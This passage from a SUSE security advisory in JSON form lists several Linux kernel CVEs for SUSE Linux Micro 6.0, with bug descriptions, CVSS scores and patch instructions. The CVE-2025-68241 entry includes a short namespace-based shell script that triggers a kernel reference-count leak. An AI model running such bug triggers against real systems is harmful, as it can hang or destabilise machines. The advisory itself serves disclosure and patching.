"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68235",
"url": "https://www.suse.com/security/cve/CVE-2025-68235"
},
{
"category": "external",
"summary": "SUSE Bug 1255209 for CVE-2025-68235",
"url": "https://bugzilla.suse.com/1255209"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68235"
},
{
"cve": "CVE-2025-68237",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68237"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtdchar: fix integer overflow in read/write ioctls\n\nThe \"req.start\" and \"req.len\" variables are u64 values that come from the\nuser at the start of the function. We mask away the high 32 bits of\n\"req.len\" so that\u0027s capped at U32_MAX but the \"req.start\" variable can go\nup to U64_MAX which means that the addition can still integer overflow.\n\nUse check_add_overflow() to fix this bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68237",
"url": "https://www.suse.com/security/cve/CVE-2025-68237"
},
{
"category": "external",
"summary": "SUSE Bug 1255203 for CVE-2025-68237",
"url": "https://bugzilla.suse.com/1255203"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68237"
},
{
"cve": "CVE-2025-68238",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68238"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: cadence: fix DMA device NULL pointer dereference\n\nThe DMA device pointer `dma_dev` was being dereferenced before ensuring\nthat `cdns_ctrl-\u003edmac` is properly initialized.\n\nMove the assignment of `dma_dev` after successfully acquiring the DMA\nchannel to ensure the pointer is valid before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68238",
"url": "https://www.suse.com/security/cve/CVE-2025-68238"
},
{
"category": "external",
"summary": "SUSE Bug 1255202 for CVE-2025-68238",
"url": "https://bugzilla.suse.com/1255202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68238"
},
{
"cve": "CVE-2025-68239",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68239"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinfmt_misc: restore write access before closing files opened by open_exec()\n\nbm_register_write() opens an executable file using open_exec(), which\ninternally calls do_open_execat() and denies write access on the file to\navoid modification while it is being executed.\n\nHowever, when an error occurs, bm_register_write() closes the file using\nfilp_close() directly. This does not restore the write permission, which\nmay cause subsequent write operations on the same file to fail.\n\nFix this by calling exe_file_allow_write_access() before filp_close() to\nrestore the write permission properly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68239",
"url": "https://www.suse.com/security/cve/CVE-2025-68239"
},
{
"category": "external",
"summary": "SUSE Bug 1255272 for CVE-2025-68239",
"url": "https://bugzilla.suse.com/1255272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68239"
},
{
"cve": "CVE-2025-68241",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68241"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe\n\nThe sit driver\u0027s packet transmission path calls: sit_tunnel_xmit() -\u003e\nupdate_or_create_fnhe(), which lead to fnhe_remove_oldest() being called\nto delete entries exceeding FNHE_RECLAIM_DEPTH+random.\n\nThe race window is between fnhe_remove_oldest() selecting fnheX for\ndeletion and the subsequent kfree_rcu(). During this time, the\nconcurrent path\u0027s __mkroute_output() -\u003e find_exception() can fetch the\nsoon-to-be-deleted fnheX, and rt_bind_exception() then binds it with a\nnew dst using a dst_hold(). When the original fnheX is freed via RCU,\nthe dst reference remains permanently leaked.\n\nCPU 0 CPU 1\n__mkroute_output()\n find_exception() [fnheX]\n update_or_create_fnhe()\n fnhe_remove_oldest() [fnheX]\n rt_bind_exception() [bind dst]\n RCU callback [fnheX freed, dst leak]\n\nThis issue manifests as a device reference count leak and a warning in\ndmesg when unregistering the net device:\n\n unregister_netdevice: waiting for sitX to become free. Usage count = N\n\nIdo Schimmel provided the simple test validation method [1].\n\nThe fix clears \u0027oldest-\u003efnhe_daddr\u0027 before calling fnhe_flush_routes().\nSince rt_bind_exception() checks this field, setting it to zero prevents\nthe stale fnhe from being reused and bound to a new dst just before it\nis freed.\n\n[1]\nip netns add ns1\nip -n ns1 link set dev lo up\nip -n ns1 address add 192.0.2.1/32 dev lo\nip -n ns1 link add name dummy1 up type dummy\nip -n ns1 route add 192.0.2.2/32 dev dummy1\nip -n ns1 link add name gretap1 up arp off type gretap \\\n local 192.0.2.1 remote 192.0.2.2\nip -n ns1 route add 198.51.0.0/16 dev gretap1\ntaskset -c 0 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\ntaskset -c 2 ip netns exec ns1 mausezahn gretap1 \\\n -A 198.51.100.1 -B 198.51.0.0/16 -t udp -p 1000 -c 0 -q \u0026\nsleep 10\nip netns pids ns1 | xargs kill\nip netns del ns1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68241",
"url": "https://www.suse.com/security/cve/CVE-2025-68241"
},
{
"category": "external",
"summary": "SUSE Bug 1255157 for CVE-2025-68241",
"url": "https://bugzilla.suse.com/1255157"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68241"
},
{
"cve": "CVE-2025-68244",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68244"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/i915: Avoid lock inversion when pinning to GGTT on CHV/BXT+VTD\n\nOn completion of i915_vma_pin_ww(), a synchronous variant of\ndma_fence_work_commit() is called. When pinning a VMA to GGTT address\nspace on a Cherry View family processor, or on a Broxton generation SoC\nwith VTD enabled, i.e., when stop_machine() is then called from\nintel_ggtt_bind_vma(), that can potentially lead to lock inversion among\nreservation_ww and cpu_hotplug locks.\n\n[86.861179] ======================================================\n[86.861193] WARNING: possible circular locking dependency detected\n[86.861209] 6.15.0-rc5-CI_DRM_16515-gca0305cadc2d+ #1 Tainted: G U\n[86.861226] ------------------------------------------------------\n[86.861238] i915_module_loa/1432 is trying to acquire lock:\n[86.861252] ffffffff83489090 (cpu_hotplug_lock){++++}-{0:0}, at: stop_machine+0x1c/0x50\n[86.861290]\nbut task is already holding lock:\n[86.861303] ffffc90002e0b4c8 (reservation_ww_class_mutex){+.+.}-{3:3}, at: i915_vma_pin.constprop.0+0x39/0x1d0 [i915]\n[86.862233]\nwhich lock already depends on the new lock.\n[86.862251]\nthe existing dependency chain (in reverse order) is:\n[86.862265]\n-\u003e #5 (reservation_ww_class_mutex){+.+.}-{3:3}:\n[86.862292] dma_resv_lockdep+0x19a/0x390\n[86.862315] do_one_initcall+0x60/0x3f0\n[86.862334] kernel_init_freeable+0x3cd/0x680\n[86.862353] kernel_init+0x1b/0x200\n[86.862369] ret_from_fork+0x47/0x70\n[86.862383] ret_from_fork_asm+0x1a/0x30\n[86.862399]\n-\u003e #4 (reservation_ww_class_acquire){+.+.}-{0:0}:\n[86.862425] dma_resv_lockdep+0x178/0x390\n[86.862440] do_one_initcall+0x60/0x3f0\n[86.862454] kernel_init_freeable+0x3cd/0x680\n[86.862470] kernel_init+0x1b/0x200\n[86.862482] ret_from_fork+0x47/0x70\n[86.862495] ret_from_fork_asm+0x1a/0x30\n[86.862509]\n-\u003e #3 (\u0026mm-\u003emmap_lock){++++}-{3:3}:\n[86.862531] down_read_killable+0x46/0x1e0\n[86.862546] lock_mm_and_find_vma+0xa2/0x280\n[86.862561] do_user_addr_fault+0x266/0x8e0\n[86.862578] exc_page_fault+0x8a/0x2f0\n[86.862593] asm_exc_page_fault+0x27/0x30\n[86.862607] filldir64+0xeb/0x180\n[86.862620] kernfs_fop_readdir+0x118/0x480\n[86.862635] iterate_dir+0xcf/0x2b0\n[86.862648] __x64_sys_getdents64+0x84/0x140\n[86.862661] x64_sys_call+0x1058/0x2660\n[86.862675] do_syscall_64+0x91/0xe90\n[86.862689] entry_SYSCALL_64_after_hwframe+0x76/0x7e\n[86.862703]\n-\u003e #2 (\u0026root-\u003ekernfs_rwsem){++++}-{3:3}:\n[86.862725] down_write+0x3e/0xf0\n[86.862738] kernfs_add_one+0x30/0x3c0\n[86.862751] kernfs_create_dir_ns+0x53/0xb0\n[86.862765] internal_create_group+0x134/0x4c0\n[86.862779] sysfs_create_group+0x13/0x20\n[86.862792] topology_add_dev+0x1d/0x30\n[86.862806] cpuhp_invoke_callback+0x4b5/0x850\n[86.862822] cpuhp_issue_call+0xbf/0x1f0\n[86.862836] __cpuhp_setup_state_cpuslocked+0x111/0x320\n[86.862852] __cpuhp_setup_state+0xb0/0x220\n[86.862866] topology_sysfs_init+0x30/0x50\n[86.862879] do_one_initcall+0x60/0x3f0\n[86.862893] kernel_init_freeable+0x3cd/0x680\n[86.862908] kernel_init+0x1b/0x200\n[86.862921] ret_from_fork+0x47/0x70\n[86.862934] ret_from_fork_asm+0x1a/0x30\n[86.862947]\n-\u003e #1 (cpuhp_state_mutex){+.+.}-{3:3}:\n[86.862969] __mutex_lock+0xaa/0xed0\n[86.862982] mutex_lock_nested+0x1b/0x30\n[86.862995] __cpuhp_setup_state_cpuslocked+0x67/0x320\n[86.863012] __cpuhp_setup_state+0xb0/0x220\n[86.863026] page_alloc_init_cpuhp+0x2d/0x60\n[86.863041] mm_core_init+0x22/0x2d0\n[86.863054] start_kernel+0x576/0xbd0\n[86.863068] x86_64_start_reservations+0x18/0x30\n[86.863084] x86_64_start_kernel+0xbf/0x110\n[86.863098] common_startup_64+0x13e/0x141\n[86.863114]\n-\u003e #0 (cpu_hotplug_lock){++++}-{0:0}:\n[86.863135] __lock_acquire+0x16\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68244",
"url": "https://www.suse.com/security/cve/CVE-2025-68244"
},
{
"category": "external",
"summary": "SUSE Bug 1255190 for CVE-2025-68244",
"url": "https://bugzilla.suse.com/1255190"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68244"
},
{
"cve": "CVE-2025-68245",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68245"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: netpoll: fix incorrect refcount handling causing incorrect cleanup\n\ncommit efa95b01da18 (\"netpoll: fix use after free\") incorrectly\nignored the refcount and prematurely set dev-\u003enpinfo to NULL during\nnetpoll cleanup, leading to improper behavior and memory leaks.\n\nScenario causing lack of proper cleanup:\n\n1) A netpoll is associated with a NIC (e.g., eth0) and netdev-\u003enpinfo is\n allocated, and refcnt = 1\n - Keep in mind that npinfo is shared among all netpoll instances. In\n this case, there is just one.\n\n2) Another netpoll is also associated with the same NIC and\n npinfo-\u003erefcnt += 1.\n - Now dev-\u003enpinfo-\u003erefcnt = 2;\n - There is just one npinfo associated to the netdev.\n\n3) When the first netpolls goes to clean up:\n - The first cleanup succeeds and clears np-\u003edev-\u003enpinfo, ignoring\n refcnt.\n - It basically calls `RCU_INIT_POINTER(np-\u003edev-\u003enpinfo, NULL);`\n - Set dev-\u003enpinfo = NULL, without proper cleanup\n 